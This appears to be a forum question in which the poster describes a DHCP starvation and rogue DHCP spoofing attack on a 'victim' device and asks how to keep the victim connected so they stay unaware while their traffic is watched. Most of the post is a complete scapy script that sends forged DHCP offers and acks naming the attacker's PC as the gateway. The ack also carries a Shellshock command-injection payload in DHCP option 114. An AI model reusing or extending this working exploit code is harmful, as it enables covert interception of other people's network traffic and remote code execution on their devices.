# continue net connection of victim after DHCP spoofing attack

Tags: scapy, dhcp, spoofing, man-in-the-middle

I'm performing a `dhcp spoofing` attack. First I run a `dhcp starvation` attack which depletes the `ip pool` of my router. Then I execute the `dhcp spoofing code` which assigns a fake ip to my victim device, when it tries to connect to the wireless router.

My problem is, after my victim device is assigned the `fake ip` it can no longer access the internet. In a real case scenario, if the victim gets disconnected from the internet, they will know something is wrong, also there's no point to a spoofing attack if I cannot see the victim's activity.

So, how do I connect my victim to the internet with the fake ip? yes i know the DHCP rouge server will act as the real server for the victim, but how exactly is the implementation supposed to be, since in my case the `dhcp rouge` server is my pc and not a router.

Here is the `dhcp spoofing` code taken from github.

```py
#! /usr/bin/env python

#Based on the PoC from https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/

import binascii
import argparse
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)  #Gets rid of IPV6 Error when importing scapy

from scapy.all import *

parser = argparse.ArgumentParser(description='DHCPSock', epilog='Shock dem shells!')
parser.add_argument('-i', '--iface', type=str, required=True, help='Interface to use')
parser.add_argument('-c', '--cmd', type=str, help='Command to execute [default: "echo pwned"]')

args = parser.parse_args()

command = args.cmd or "echo 'pwned'"

if os.geteuid() != 0:
    sys.exit("Run me as r00t")



#BOOTP
#siaddr = DHCP server ip
#yiaddr = ip offered to client
#xid = transaction id 
#chaddr = clients mac address in binary format

def dhcp_offer(raw_mac, xid):
    print "in dhcp_offer"
    packet = (Ether(src=get_if_hwaddr(args.iface), dst='ff:ff:ff:ff:ff:ff') /
    IP(src="192.168.0.105", dst='255.255.255.255') /
    UDP(sport=67, dport=68) /
    BOOTP(op='BOOTREPLY', chaddr=raw_mac, yiaddr='192.168.1.4', siaddr='192.168.0.105', xid=xid) /
    DHCP(options=[("message-type", "offer"),
        ('server_id', '192.168.0.105'),
        ('subnet_mask', '255.255.255.0'),
        ('router', '192.168.0.105'),
        ('lease_time', 172800),
        ('renewal_time', 86400),
        ('rebinding_time', 138240),
        "end"]))

    #print packet.show()
    return packet


def dhcp_ack(raw_mac, xid, command):
    print "in dhcp_ack"
    packet = (Ether(src=get_if_hwaddr(args.iface), dst='ff:ff:ff:ff:ff:ff') /
    IP(src="192.168.0.105", dst='255.255.255.255') /
    UDP(sport=67, dport=68) /
    BOOTP(op='BOOTREPLY', chaddr=raw_mac, yiaddr='192.168.1.4', siaddr='192.168.0.105', xid=xid) /
    DHCP(options=[("message-type", "ack"),
        ('server_id', '192.168.0.105'),
        ('subnet_mask', '255.255.255.0'),
        ('router', '192.168.0.105'),
        ('lease_time', 172800),
        ('renewal_time', 86400),
        ('rebinding_time', 138240),
        (114, "() { ignored;}; " + command),
        "end"]))

    #print packet.show()
    return packet


def dhcp(resp):
    if resp.haslayer(DHCP):
        mac_addr = resp[Ether].src
        raw_mac = binascii.unhexlify(mac_addr.replace(":", ""))

        if resp[DHCP].options[0][1] == 1:
            xid = resp[BOOTP].xid
            print "[*] Got dhcp DISCOVER from: " + mac_addr + " xid: " + hex(xid)
            print "[*] Sending OFFER..."
            packet = dhcp_offer(raw_mac, xid)
            #packet.plot(lambda x:len(x))
            #packet.pdfdump("test.pdf")
            #print hexdump(packet)
            #print packet.show()
            sendp(packet, iface=args.iface)

        if resp[DHCP].options[0][1] == 3:
            xid = resp[BOOTP].xid
            print "[*] Got dhcp REQUEST from: " + mac_addr + " xid: " + hex(xid)
            print "[*] Sending ACK..."
            packet = dhcp_ack(raw_mac, xid, command)
            #print hexdump(packet)
            #print packet.show()
            sendp(packet, iface=args.iface)

print "[*] Waiting for a DISCOVER..."
sniff(filter="udp and (port 67 or 68)", prn=dhcp, iface=args.iface)

#sniff(filter="udp and (port 67 or 68)", prn=dhcp)
```